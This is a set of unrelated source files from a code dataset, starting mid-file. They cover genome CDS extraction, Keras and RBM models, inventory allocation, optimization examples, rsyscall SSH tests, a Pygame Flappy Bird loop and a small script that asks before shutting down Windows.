')\n\n\t\t\tcds_limits = location.split(':')\n\t\t\tjoin_start = int(re.findall('\\d+', cds_limits[0])[0])\n\t\t\tjoin_end = int(re.findall('\\d+', cds_limits[1])[0])\n\t\t\tjoin_strand = re.findall('(?<=\\().+(?=\\))', location)[0]\n\n\t\t\tjoin_location_nice = '%s:%s(%s);' % (join_start+1, join_end,join_strand)\n\t\t\tcds_locations_nice.append(join_location_nice)\n\n\t\t\tif join_strand == 
'-':\n\t\t\t\tcds_sequence += genome_sequence[join_start:join_end].reverse_complement()\n\t\t\telse:\n\t\t\t\tcds_sequence += genome_sequence[join_start:join_end]\n\n\t\tfor join_location_nice in reversed(cds_locations_nice):\n\t\t\tcds_location_nice += join_location_nice\n\n\telse:\n\t\tif cds_strand == -1:\n\t\t\tcds_sequence = genome_sequence[cds_start:cds_end].reverse_complement()\n\t\telse:\n\t\t\tcds_sequence = genome_sequence[cds_start:cds_end]\n\n\t\tcds_location_nice += '%s:%s' % (cds_start+1,cds_end)\n\n\n\treturn cds_sequence, cds_location_nice\n\n\ndef check_length_three(cds):\n\n\tif len(cds) % 3 != 0:\n\t\tfilter_check = False\n\telse:\n\t\tfilter_check = True\n\n\treturn filter_check\n\ndef check_bases(cds):\n\n\tfilter_check = True\n\tbases = ['A', 'C', 'T', 'G']\n\tfor nt in cds:\n\t\tif nt not in bases:\n\t\t\tfilter_check = False\n\n\treturn filter_check\n\ndef check_standard_stop(cds, translation_table):\n\n\tfilter_check = True\n\tstop_codons = {}\n\tstop_codons[11] = ['TAA', 'TGA', 'TAG']\n\tstop_codons[4] = ['TAA', 'TAG']\n\n\tif cds[-3:] not in stop_codons[int(translation_table)]:\n\t\tfilter_check = False\n\n\treturn filter_check\n\n\ndef check_inframe_stop(cds, translation_table):\n\n\tfilter_check = True\n\tstop_codons = {}\n\tstop_codons[11] = ['TAA', 'TGA', 'TAG']\n\tstop_codons[4] = ['TAA', 'TAG']\n\n\tfor i in range(0, len(cds)-3, 3):\n\t\tif cds[i:i+3] in stop_codons[int(translation_table)]:\n\t\t\tfilter_check = False\n\n\treturn filter_check\n\n\ndef parse_genome(accession, record_path):\n\n\trecords = 0\n\n\toutput_record = ''\n\terror_string = ''\n\n\ttranslation_table_4 = False\n\n\n\tfor seq_record in SeqIO.parse(record_path, \"embl\"):\n\n\t\tgenome_sequence = seq_record.seq\n\n\n\t\tfor seq_feature in seq_record.features:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# For each of the genome features\n\t\t\tif seq_feature.type==\"CDS\":\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Check if feature is a 
CDS\n\n\t\t\t\ttry:\n\t\t\t\t\tlen(seq_feature.qualifiers['translation'])==1\t\t\t\t\t\t\t\t\t# Check translation exists\n\t\t\t\t\trecords += 1\n\n\t\t\t\t\t# Extract CDS information\n\t\t\t\t\tprotein_id = seq_feature.qualifiers['protein_id'][0]\t\t\t\t\t\t\t\t\t# Protein ID\n\t\t\t\t\ttransl_table = seq_feature.qualifiers['transl_table'][0]\t\t\t\t\t\t\t\t# Translation table\n\t\t\t\t\toperator = seq_feature.location_operator\t\t\t\t\t\t\t\t\t\t\t\t# Location operator (join)\n\t\t\t\t\tcds_strand = seq_feature.strand\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Strand\n\t\t\t\t\tcds_start = seq_feature.location.nofuzzy_start\n\t\t\t\t\tcds_end = seq_feature.location.nofuzzy_end\n\t\t\t\t\tcds_location = seq_feature.location\n\n\t\t\t\t\tif transl_table == '4':\n\t\t\t\t\t\ttranslation_table_4 = True\n\n\t\t\t\t\ttry:\n\t\t\t\t\t\tpseudo = seq_feature.qualifiers['pseudo']\n\t\t\t\t\texcept:\n\t\t\t\t\t\tpass\n\n\n\t\t\t\t\ttry:\n\t\t\t\t\t\tlocus_tag = seq_feature.qualifiers['locus_tag'][0]\n\t\t\t\t\texcept:\n\t\t\t\t\t\tlocus_tag = 'no_locus_tag_cds%s' % records\n\n\t\t\t\t\ttry:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# See if the cds name exists\n\t\t\t\t\t\tcds_name = seq_feature.qualifiers['gene'][0]\t\t\t\t\t\t\t\t\t\t# Gene name\n\t\t\t\t\texcept:\n\t\t\t\t\t\tcds_name = 'no_cds_qualifier_%s' % seq_feature.qualifiers['locus_tag'][0]\n\n\t\t\t\t\tcds_sequence, cds_location_nice = get_sequence_from_raw(genome_sequence, cds_location, cds_start, cds_end, cds_strand, operator)\t\t# CDS sequence\n\n\n\t\t\t\t\t# Filter cds\n\t\t\t\t\tcds_multiple_three_check = check_length_three(cds_sequence)\n\t\t\t\t\tcds_base_check = check_bases(cds_sequence)\n\t\t\t\t\tcds_check_stop = check_standard_stop(cds_sequence, transl_table)\n\t\t\t\t\tcds_inframe_stop = check_inframe_stop(cds_sequence, transl_table)\n\n\t\t\t\t\tif not cds_multiple_three_check:\n\t\t\t\t\t\terror_string += '%s,%s,1\\n' % (accession, locus_tag)\n\t\t\t\t\tif not cds_base_check:\n\t\t\t\t\t\terror_string += 
'%s,%s,2\\n' % (accession, locus_tag)\n\t\t\t\t\tif not cds_check_stop:\n\t\t\t\t\t\terror_string += '%s,%s,3\\n' % (accession, locus_tag)\n\t\t\t\t\tif not cds_inframe_stop:\n\t\t\t\t\t\terror_string += '%s,%s,4\\n' % (accession, locus_tag)\n\n\t\t\t\t\tcds_entry = ''\n\t\t\t\t\tif cds_multiple_three_check and cds_base_check and cds_check_stop and cds_inframe_stop:\n\t\t\t\t\t\tcds_entry = '>%s|%s|%s|%s|%s|%s|%s\\n' % (accession, locus_tag, protein_id, cds_name, transl_table, cds_location_nice, cds_strand)\n\t\t\t\t\t\tcds_entry += '%s\\n' % cds_sequence\n\n\t\t\t\t\t\toutput_record += cds_entry\n\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\n\treturn output_record, error_string, translation_table_4\n\ndef extract_cds(accession, table):\n\n\tif table == 11:\n\t\trecord_output_path = output_fasta_directory + accession + '.txt'\n\t\trecord_path = good_genomes + accession + '.embl'\n\telif table == 4:\n\t\trecord_output_path = output_fasta_directory_t4 + accession + '.txt'\n\t\trecord_path = t4_genomes + accession + '.embl'\n\n\n\n\ttry:\n\t\toutput_record, error_string, table4 = parse_genome(accession, record_path)\n\texcept:\n\n\t\t# Workaround for BioPython thrown up by awkward annotation\n\t\t# https://github.com/biopython/biopython/issues/341\n\n\t\tline_count = 0\n\t\tf = open(record_path, \"rU\")\n\t\tlines = f.readlines()\n\t\tf.close()\n\n\t\toutput_lines = []\n\t\tfor line in lines:\n\t\t if line.startswith('CO'):\n\t\t \toutput_lines.append(\"#\" + line)\n\t\t else:\n\t\t \toutput_lines.append(line)\n\n\t\tf = open(record_path, \"w\")\n\t\tf.write(\"\".join(output_lines))\n\t\tf.close()\n\n\t\t# Now parse the genome\n\t\toutput_record, error_string, table4 = parse_genome(accession, record_path)\n\n\treturn output_record, record_output_path, error_string, accession, table4\n\n\n\ndef write_to_file(output_record, record_output_path):\n\n\tprint ('Writing to: %s' % record_output_path)\n\n\toutput_file = open(record_output_path, 
'w')\n\toutput_file.write(output_record)\n\toutput_file.close()\n\n\n\n\ndef run_genomes(accessions, acc_counts, table):\n\n\toutputs = []\n\n\tfor accession in accessions:\n\n\t\tprint ('{}: {}'.format(accession, acc_counts[accession]))\n\t\toutput_record, record_output_path, error_string, accession, table4 = extract_cds(accession, table)\n\t\toutput = [output_record, record_output_path, error_string, accession, table4]\n\n\t\toutputs.append(output)\n\n\treturn (outputs)\n\n\n\n\ndef run():\n\n\tstart_time = time.time()\t# Set the start time\n\n\tscript_misc() \t# Description\n\n\tprint('Processing good genomes')\n\n\tcreate_strict_directory(output_fasta_directory)\n\tcreate_strict_directory(output_filter_directory)\n\n\taccession_list = get_accession_list(genome_list)\n\n\taccessions = []\n\tacc_counts = {}\n\n\taccession_count = 0\n\n\tfor accession in sorted(accession_list):\n\t\taccession_count += 1\n\t\tif accession_count:\n\t\t# if accession_count <= 10:\n\t\t\taccessions.append(accession)\n\t\t\tacc_counts[accession] = accession_count\n\n\tresults = run_in_parralell(accessions, [acc_counts, 11], run_genomes)\n\n\n\terror_file = open(output_error_file_path, 'w')\n\terror_file.write('acc,locus_tag,error_code,,1=length_fail,2=non_actg,3=non_standard_stop,4=in_frame_stop\\n')\n\n\ttable_4_file = open(output_table_4_path, 'w')\n\n\tfor result in results:\n\t\toutputs = result.get()\n\t\tfor output in outputs:\n\t\t\toutput_record = output[0]\n\t\t\trecord_output_path = output[1]\n\t\t\terror_string = output[2]\n\t\t\taccession = output[3]\n\t\t\ttable4 = output[4]\n\n\t\t\twrite_to_file(output_record, record_output_path)\n\t\t\terror_file.write(error_string)\n\n\t\t\tif table4:\n\t\t\t\tline = '%s\\n' % accession\n\t\t\t\ttable_4_file.write(line)\n\n\terror_file.close()\n\ttable_4_file.close()\n\n\n\tprint('Processing good genomes')\n\n\tcreate_strict_directory(output_fasta_directory_t4)\n\taccession_list = get_accession_list(genome_list_t4)\n\n\taccessions = 
[]\n\tacc_counts = {}\n\n\taccession_count = 0\n\n\tfor accession in sorted(accession_list):\n\t\taccession_count += 1\n\t\tif accession_count:\n\t\t\taccessions.append(accession)\n\t\t\tacc_counts[accession] = accession_count\n\n\tresults = run_in_parralell(accessions, [acc_counts, 4], run_genomes)\n\n\terror_file = open(output_error_file_path_t4, 'w')\n\terror_file.write('acc,locus_tag,error_code,,1=length_fail,2=non_actg,3=non_standard_stop,4=in_frame_stop\\n')\n\n\tfor result in results:\n\t\toutputs = result.get()\n\t\tfor output in outputs:\n\t\t\toutput_record = output[0]\n\t\t\trecord_output_path = output[1]\n\t\t\terror_string = output[2]\n\t\t\taccession = output[3]\n\t\t\ttable = output[4]\n\n\t\t\twrite_to_file(output_record, record_output_path)\n\t\t\terror_file.write(error_string)\n\n\n\terror_file.close()\n\n\n\t# Print the elapsed time\n\telapsed = time.time() - start_time\n\tprint (str(timedelta(seconds=elapsed)))\n\n\n###############\n# Run script #\n###############\n\nif __name__ == \"__main__\":\n\trun()\n","sub_path":"scripts/3_parse_genomes/embl_to_fasta.py","file_name":"embl_to_fasta.py","file_ext":"py","file_size_in_byte":12297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"255641814","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom keras import layers, models\nfrom tfmiss.keras.layers import TemporalConvNet\n\n\nclass MnistModel(models.Model):\n CORE_GRU = 'GRU'\n CORE_LSTM = 'LSTM'\n CORE_TCN = 'TCN'\n CORE_TCN_HE = 'TCN_HE'\n\n def __init__(self, core, filters, kernel_size, dropout):\n inputs = layers.Input(shape=(28 * 28, 1))\n\n if self.CORE_GRU == core:\n sequence = layers.GRU(units=filters[0], dropout=dropout, return_sequences=True)\n elif self.CORE_LSTM == core:\n sequence = layers.LSTM(units=filters[0], dropout=dropout, return_sequences=True)\n elif self.CORE_TCN == core:\n sequence = 
TemporalConvNet(filters=filters, kernel_size=kernel_size, dropout=dropout)\n else:\n if not self.CORE_TCN_HE == core:\n raise ValueError('Wrong \"core\" value')\n sequence = TemporalConvNet(\n filters=filters, kernel_size=kernel_size, dropout=dropout, kernel_initializer='he_uniform')\n\n last = layers.Lambda(lambda x: x[:, -1, :])\n predict = layers.Dense(10, activation='softmax') # Digits 0 - 9\n\n outputs = sequence(inputs)\n outputs = last(outputs)\n outputs = predict(outputs)\n\n super(MnistModel, self).__init__(inputs=inputs, outputs=outputs)\n","sub_path":"examples/tcn/mnist_pixel/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"34202991","text":"\"\"\"\r\nObject to process an order based on the warehouses it can ship from.\r\nIf an empty list is returned, the order could not be completed.\r\n\r\n@author: Laurel Dernbach\r\n@date: August 27, 2020\r\n\"\"\"\r\n\r\n\r\nclass InventoryAllocator(object):\r\n def __init__(self, order, inventory):\r\n self.order = order # map {product:quantity}\r\n self.inventory = inventory # list of WarehouseObjects\r\n\r\n def allocate(self):\r\n allocation = {}\r\n # \"copy\" the warehouse inventory information to restore in the case of a failed order\r\n for warehouse in self.inventory:\r\n warehouse.hold()\r\n for product in self.order:\r\n quantity_needed = self.order[product]\r\n for warehouse in self.inventory:\r\n # move onto next product in order\r\n if quantity_needed == 0:\r\n break\r\n if product in warehouse.inventory:\r\n # no need to split product across warehouses\r\n if quantity_needed <= warehouse.inventory[product]:\r\n warehouse.inventory[product] -= quantity_needed\r\n if warehouse.name in allocation:\r\n allocation[warehouse.name].append({product: quantity_needed})\r\n else:\r\n allocation[warehouse.name] = [{product: quantity_needed}]\r\n quantity_needed = 0\r\n # attempt to 
split across warehouses\r\n else:\r\n if warehouse.inventory[product] > 0:\r\n quantity_needed -= warehouse.inventory[product]\r\n if warehouse.name in allocation:\r\n allocation[warehouse.name].append({product: warehouse.inventory[product]})\r\n else:\r\n allocation[warehouse.name] = [{product: warehouse.inventory[product]}]\r\n warehouse.inventory[product] = 0\r\n if quantity_needed > 0:\r\n print(\"ERROR: not enough inventory\")\r\n # restore original inventory before order fails\r\n for warehouse in self.inventory:\r\n warehouse.restore()\r\n return []\r\n\r\n return allocation\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"trackingcode-data-processor/src/InventoryAllocator.py","file_name":"InventoryAllocator.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"346865637","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 24 20:16:24 2020\r\n\r\n@author: quann\r\n\"\"\"\r\n\r\nh=int(input(\"Số lần lặp của thông báo = \"))\r\nimport time\r\nimport os \r\nwhile h>0:\r\n a=input(\"Bạn có muốn tắt máy hay không ? 
(có/không): \")\r\n if a=='có':\r\n os.system(\"shutdown /s /t 1\") \r\n else : \r\n time.sleep(30)\r\n\r\n","sub_path":"bài tập 9.py","file_name":"bài tập 9.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"177074479","text":"import tensorflow as tf\nimport numpy as np\nfrom collections import defaultdict\nfrom rbm import RBM\nfrom dataset import load_dataset\nfrom utils import chunker, revert_expected_value, expand, iteration_str\nimport sys\nfrom math import sqrt\n\ntf.flags.DEFINE_integer(\"epochs\", 100, \"\")\ntf.flags.DEFINE_integer(\"batch_size\", 10, \"\")\ntf.flags.DEFINE_integer(\"num_hidden\", 100, \"\")\ntf.flags.DEFINE_float(\"decay\", 0.01, \"\")\ntf.flags.DEFINE_float(\"momentum\", 0.9, \"\")\ntf.flags.DEFINE_float(\"l_v\", 0.01, \"\")\ntf.flags.DEFINE_float(\"l_w\", 0.01, \"\")\ntf.flags.DEFINE_float(\"l_h\", 0.01, \"\")\ntf.flags.DEFINE_string(\"train_path\", \"ml-100k/u1.base\", \"\")\ntf.flags.DEFINE_string(\"test_path\", \"ml-100k/u1.test\", \"\")\ntf.flags.DEFINE_string(\"sep\", \"\\t\", \"\")\nFLAGS = tf.flags.FLAGS\n\n\nif __name__ == \"__main__\":\n all_users, all_movies, tests = load_dataset(FLAGS.train_path, FLAGS.test_path,\n FLAGS.sep, user_based=True)\n rbm = RBM(len(all_movies) * 5, FLAGS.num_hidden)\n print(\"model created\")\n init = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init)\n profiles = defaultdict(list)\n with open(FLAGS.train_path, 'rt') as data:\n for i, line in enumerate(data):\n uid, mid, rat, timstamp = line.strip().split(FLAGS.sep)\n profiles[uid].append((mid, float(rat)))\n print(\"Users and ratings loaded\")\n for e in range(FLAGS.epochs):\n \n for batch_i, batch in enumerate(chunker(list(profiles.keys()),\n FLAGS.batch_size)):\n size = min(len(batch), FLAGS.batch_size)\n \n # create needed binary vectors\n bin_profiles = {}\n masks = {}\n for userid in batch:\n user_profile = np.array([0.] 
* len(all_movies))\n mask = [0] * (len(all_movies) * 5)\n for movie_id, rat in profiles[userid]:\n user_profile[all_movies.index(movie_id)] = rat\n for _i in range(5):\n mask[5 * all_movies.index(movie_id) + _i] = 1\n example = expand(np.array([user_profile])).astype('float32')\n bin_profiles[userid] = example\n masks[userid] = mask\n\n profile_batch = [bin_profiles[el] for el in batch]\n masks_batch = [masks[id] for id in batch]\n train_batch = np.array(profile_batch).reshape(size,\n len(all_movies * 5))\n train_masks = np.array(masks_batch).reshape(size,\n len(all_movies) * 5)\n _ = sess.run([rbm.optimizer], feed_dict={rbm.input: train_batch, rbm.mask : masks_batch})\n sys.stdout.write('.')\n sys.stdout.flush()\n \n # test step\n ratings = []\n predictions = []\n for batch in chunker(list(tests.keys()), FLAGS.batch_size):\n size = min(len(batch), FLAGS.batch_size)\n\n # create needed binary vectors\n bin_profiles = {}\n masks = {}\n for userid in batch:\n user_profile = [0.] * len(all_movies)\n mask = [0] * (len(all_movies) * 5)\n for movie_id, rat in profiles[userid]:\n user_profile[all_movies.index(movie_id)] = rat\n for _i in range(5):\n mask[5 * all_movies.index(movie_id) + _i] = 1\n example = expand(np.array([user_profile])).astype('float32')\n bin_profiles[userid] = example\n masks[userid] = mask\n\n positions = {profile_id: pos for pos, profile_id\n in enumerate(batch)}\n profile_batch = [bin_profiles[el] for el in batch]\n test_batch = np.array(profile_batch).reshape(size,\n len(all_movies * 5))\n predict = sess.run(rbm.predict, feed_dict={rbm.input : test_batch})\n user_preds = revert_expected_value(predict)\n \n for profile_id in batch:\n test_movies = tests[profile_id]\n try:\n for movie, rating in test_movies:\n current_profile = user_preds[positions[profile_id]]\n predicted = current_profile[all_movies.index(movie)]\n rating = float(rating)\n ratings.append(rating)\n predictions.append(predicted)\n except Exception:\n pass\n\n vabs = 
np.vectorize(abs)\n distances = np.array(ratings) - np.array(predictions)\n\n mae = vabs(distances).mean()\n rmse = sqrt((distances ** 2).mean())\n print(\"\\nepoch: {}, mae/rmse: {}/{}\".format(e, mae, rmse))\n","sub_path":"83. Restricted Boltzmann Machines for Collaborative Filtering in Tensorflow/user_based_run.py","file_name":"user_based_run.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"249817006","text":"from flask_restx import Api, fields\n\nfrom sledilnik.classes.Point import Point\n\n\nclass Field:\n def __init__(self, top_left: Point, top_right: Point, bottom_right: Point, bottom_left: Point):\n self.top_left: Point = top_left\n self.top_right: Point = top_right\n self.bottom_right: Point = bottom_right\n self.bottom_left: Point = bottom_left\n\n def to_json(self):\n return {\n \"top_left\": self.top_left.to_json(),\n \"top_right\": self.top_right.to_json(),\n \"bottom_right\": self.bottom_right.to_json(),\n \"bottom_left\": self.bottom_left.to_json()\n }\n\n def to_tuple(self) -> tuple:\n return (\n self.top_left.to_tuple(),\n self.top_right.to_tuple(),\n self.bottom_right.to_tuple(),\n self.bottom_left.to_tuple()\n )\n\n @classmethod\n def to_model(cls, api: Api):\n return api.model('Field', {\n 'top_left': fields.Nested(Point.to_model(api), required=True),\n 'top_right': fields.Nested(Point.to_model(api), required=True),\n 'bottom_right': fields.Nested(Point.to_model(api), required=True),\n 'bottom_left': fields.Nested(Point.to_model(api), required=True),\n })\n","sub_path":"sledilnik/classes/Field.py","file_name":"Field.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"325598987","text":"import random\n\nimport dimod\nimport optneal as opn\nfrom openjij import SASampler\n\n\ndef main():\n \"\"\" Example of K-hot problem \"\"\"\n N = 12\n K = 10\n 
numbers = [random.uniform(0, 5) for _ in range(N)]\n print(sorted(numbers))\n\n cost_dict = {i: numbers[i] for i in range(N)}\n cost = opn.Cost(cost_dict, shape=N)\n\n constraints = [({i: 1 for i in range(N)}, K)]\n penalty = opn.Penalty(constraints, shape=N)\n\n lam = 5.0\n cost_func = cost + lam * penalty.normalize()\n # bqm = cost_func.to_dimod_bqm()\n Q, _ = cost_func.to_qubo()\n\n cost_func.show_qubo()\n\n sa_sampler = SASampler()\n # lagrex_sampler = opn.LagrangeRelaxSampler(sa_sampler)\n # sampleset = lagrex_sampler.sample(bqm, num_reads=10)\n sampleset = sa_sampler.sample_qubo(Q, num_reads=10)\n\n # solver = dimod.ExactSolver()\n # results = solver.sample(bqm)\n\n # for sample in results.lowest().samples():\n # print([numbers[k] for k, v in sample.items() if v == 1])\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/ex_khot.py","file_name":"ex_khot.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"652312706","text":"#!/usr/bin/env python3\n# encoding: utf-8\nimport numpy as np\n\nclass NG(object):\n \"\"\"\n Normalized Gradient Descent learner.\n As per Ross,Mineiro,Langford: \"Normalized Online Learning\" (UAI2013)\n Works only with LinearModel\n \"\"\"\n\n def __init__(self, model, loss, eta, verbose=False):\n self.model=model\n assert model.__class__.__name__=='LinearModel'\n self.loss=loss\n self.grad_loss=lambda x,y:self.loss.grad_loss(x,y)\n self.eta=eta\n self.verbose=verbose\n self.n=1\n self.s=np.zeros(model.dim)\n self.N=0\n\n def predict(self, x):\n return self.model.predict(x)\n\n def verbose(func):\n def wrap(self,x,y):\n if self.verbose:\n print(self.model.get_param_vector())\n print(self.eta*self.grad_loss(x,y))\n ret = func(self,x,y)\n if self.verbose:\n print(\"gradient descent step with fixed eta: gradient l2 norm is %s\"\n %(-self.eta*np.dot(self.grad_loss(x,y),self.grad_loss(x,y))))\n return ret\n return wrap\n\n @verbose\n 
def fit(self, x,y):\n w=self.model.get_param_vector()\n for i in range(0,self.model.dim):\n if np.abs(x[i])>self.s[i]:\n w[i]=w[i]*self.s[i]*self.s[i]/(x[i]*x[i])\n self.s[i]=np.abs(x[i])\n self.N=self.N+np.sum(x*x/(self.s*self.s))\n self.model.set_param_vector(w)\n G=self.loss.d_loss_directional(x,y,i)\n\n for i in range(0,self.model.dim):\n w[i]=w[i] - self.eta*self.n*self.loss.d_loss_directional(x,y,i)/(self.N*self.s[i]*self.s[i])\n self.n+=1\n\n self.model.set_param_vector(w)\n","sub_path":"algos/ng.py","file_name":"ng.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"225712718","text":"from __future__ import annotations\n\nfrom rsyscall.trio_test_case import TrioTestCase\nimport rsyscall.thread\nfrom rsyscall.nix import local_store, enter_nix_container\nfrom rsyscall.misc import bash_nixdep, coreutils_nixdep, hello_nixdep\nfrom rsyscall.tasks.ssh import *\nimport rsyscall.tasks.local as local\n\nfrom rsyscall.unistd import SEEK\nfrom rsyscall.signal import Sigset, HowSIG\nfrom rsyscall.sys.memfd import MFD\n\nfrom rsyscall.handle import FileDescriptor\nfrom rsyscall.path import Path\nfrom rsyscall.thread import Thread, Command\nfrom rsyscall.command import Command\nfrom rsyscall.monitor import AsyncChildProcess\n\n# import logging\n# logging.basicConfig(level=logging.DEBUG)\n\nasync def start_cat(thread: Thread, cat: Command,\n stdin: FileDescriptor, stdout: FileDescriptor) -> AsyncChildProcess:\n thread = await thread.fork()\n await thread.unshare_files_and_replace({\n thread.stdin: stdin,\n thread.stdout: stdout,\n })\n child = await thread.exec(cat)\n return child\n\nclass TestSSH(TrioTestCase):\n async def asyncSetUp(self) -> None:\n self.local = local.thread\n self.store = local_store\n self.host = await make_local_ssh(self.local, self.store)\n self.local_child, self.remote = await self.host.ssh(self.local)\n\n async def asyncTearDown(self) -> None:\n await 
self.local_child.kill()\n\n async def test_read(self) -> None:\n [(local_sock, remote_sock)] = await self.remote.open_channels(1)\n data = b\"hello world\"\n await local_sock.write(await self.local.ram.ptr(data))\n valid, _ = await remote_sock.read(await self.remote.ram.malloc(bytes, len(data)))\n self.assertEqual(len(data), valid.size())\n self.assertEqual(data, await valid.read())\n\n async def test_exec_true(self) -> None:\n bash = await self.store.bin(bash_nixdep, \"bash\")\n await self.remote.run(bash.args('-c', 'true'))\n\n async def test_exec_pipe(self) -> None:\n [(local_sock, remote_sock)] = await self.remote.open_channels(1)\n cat = await self.store.bin(coreutils_nixdep, \"cat\")\n thread = await self.remote.fork()\n await thread.unshare_files_and_replace({\n thread.stdin: remote_sock,\n thread.stdout: remote_sock,\n })\n child_process = await thread.exec(cat)\n\n in_data = await self.local.ram.ptr(b\"hello\")\n written, _ = await local_sock.write(in_data)\n valid, _ = await local_sock.read(written)\n self.assertEqual(in_data.value, await valid.read())\n\n async def test_fork(self) -> None:\n thread1 = await self.remote.fork()\n async with thread1:\n thread2 = await thread1.fork()\n await thread2.close()\n\n async def test_nest(self) -> None:\n local_child, remote = await self.host.ssh(self.remote)\n await local_child.kill()\n\n async def test_copy(self) -> None:\n cat = await self.store.bin(coreutils_nixdep, \"cat\")\n\n local_file = await self.local.task.memfd_create(await self.local.ram.ptr(Path(\"source\")))\n remote_file = await self.remote.task.memfd_create(await self.remote.ram.ptr(Path(\"dest\")))\n\n data = b'hello world'\n await local_file.write(await self.local.ram.ptr(data))\n await local_file.lseek(0, SEEK.SET)\n\n [(local_sock, remote_sock)] = await self.remote.open_channels(1)\n\n local_child = await start_cat(self.local, cat, local_file, local_sock)\n await local_sock.close()\n\n remote_child = await start_cat(self.remote, cat, 
remote_sock, remote_file)\n await remote_sock.close()\n\n await local_child.check()\n await remote_child.check()\n\n await remote_file.lseek(0, SEEK.SET)\n read, _ = await remote_file.read(await self.remote.ram.malloc(bytes, len(data)))\n self.assertEqual(await read.read(), data)\n\n async def test_sigmask_bug(self) -> None:\n thread = await self.remote.fork()\n await thread.unshare_files(going_to_exec=True)\n await rsyscall.thread.do_cloexec_except(\n thread, set([fd.near for fd in thread.task.fd_handles]))\n await self.remote.task.sigprocmask((HowSIG.SETMASK,\n await self.remote.ram.ptr(Sigset())),\n await self.remote.ram.malloc(Sigset))\n await self.remote.task.read_oldset_and_check()\n\n async def test_nix_deploy(self) -> None:\n # make it locally so that it can be cleaned up even when the\n # remote enters the container\n tmpdir = await self.local.mkdtemp()\n async with tmpdir:\n store = await enter_nix_container(local_store, self.remote, tmpdir.path)\n hello = await store.bin(hello_nixdep, \"hello\")\n await self.remote.run(hello)\n","sub_path":"python/rsyscall/tests/test_ssh.py","file_name":"test_ssh.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"584500919","text":"# Author: Kamil Woźniak\n# Student ID: 303183\n# Email: jestem.kamil.wozniak@gmail.com\n# GitHub: https://github.com/Valaraucoo/flappybird\n\nimport pygame,random,os,time\nfrom gameobjects import Bird,Wall,Button\n\n\nclass Game():\n\n def __init__(self,game_name , screen_width , screen_height,intro):\n\n\n # ============= GAME DISPLAY CONFIG =============#\n self.SCREEN_WIDTH,self.SCREEN_HEIGHT = screen_width,screen_height\n\n self.BACKGROUND = pygame.image.load(os.path.join('images','bg2.png'))\n self.BACKGROUND_X = intro.BACKGROUND_X\n\n\n self.FPS_MAX = 60\n\n #GAME & MUSIC INIT\n pygame.mixer.init()\n pygame.mixer.pre_init()\n pygame.init()\n self.WINDOW = 
pygame.display.set_mode((self.SCREEN_WIDTH, self.SCREEN_HEIGHT))\n pygame.display.set_caption(game_name)\n\n self.MUSIC = intro.MUSIC\n\n\n #TICKS AND LOOP CONFIG\n self.LOOP = intro.GAME_LOOP\n self.FPS_CLOCK = pygame.time.Clock()\n self.FPS_DELTA = 0\n\n\n self.BIRD = Bird(self,100,50)\n self.WALLS = [Wall(self,1000,500,250,5)]\n\n self.score = 0\n self.i = 0\n\n\n\n\n self.music_ding = pygame.mixer.Sound(os.path.join('music','316798__grey24__flyffnotif.wav'))\n self.counter = 0\n self.couter_MAX = 120\n\n #============= MAIN LOOP =============#\n\n self.main_loop()\n self.SCORE = self.score\n\n\n\n\n\n def main_loop(self):\n while self.LOOP:\n pygame.time.delay(5)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.LOOP = False\n\n self.FPS_DELTA += self.FPS_CLOCK.tick() / 1000\n while self.FPS_DELTA > 1 / self.FPS_MAX:\n self.tick()\n self.FPS_DELTA -= 1 / self.FPS_MAX\n\n self.WINDOW.fill((0,0,0))\n self.WINDOW.blit(self.BACKGROUND, (self.BACKGROUND_X, 0))\n\n self.draw()\n\n if self.BACKGROUND_X <= -1280 :\n self.BACKGROUND_X = 0\n self.BACKGROUND_X -= 2\n\n\n pygame.display.update()\n\n def tick(self):\n self.BIRD.tick()\n for wall in self.WALLS:\n wall.tick()\n if wall.x + wall.width <= 0:\n self.WALLS.remove(wall)\n\n if (self.BIRD.x + self.BIRD.lenght >= wall.x and self.BIRD.y > wall.y + wall.hole ):\n self.LOOP = False\n\n elif ((wall.x<=self.BIRD.x + self.BIRD.lenght <= wall.x + wall.width) and (self.BIRD.y < wall.y - wall.hole)):\n self.LOOP = False\n elif ((wall.x<=self.BIRD.x + self.BIRD.lenght <= wall.x + wall.width) and ((self.BIRD.y + self.BIRD.lenght > wall.y)or (self.BIRD.y > wall.y))):\n self.LOOP = False\n\n if (wall.x + wall.width - 20== self.BIRD.x ):\n if self.MUSIC:\n self.music_ding.play()\n self.score += 1\n\n if (self.BIRD.y + self.BIRD.lenght >= self.SCREEN_HEIGHT) or (self.BIRD.y <= 0):\n self.LOOP = False\n if self.counter == self.couter_MAX :\n self.create_new_wall()\n self.counter = 0\n\n\n 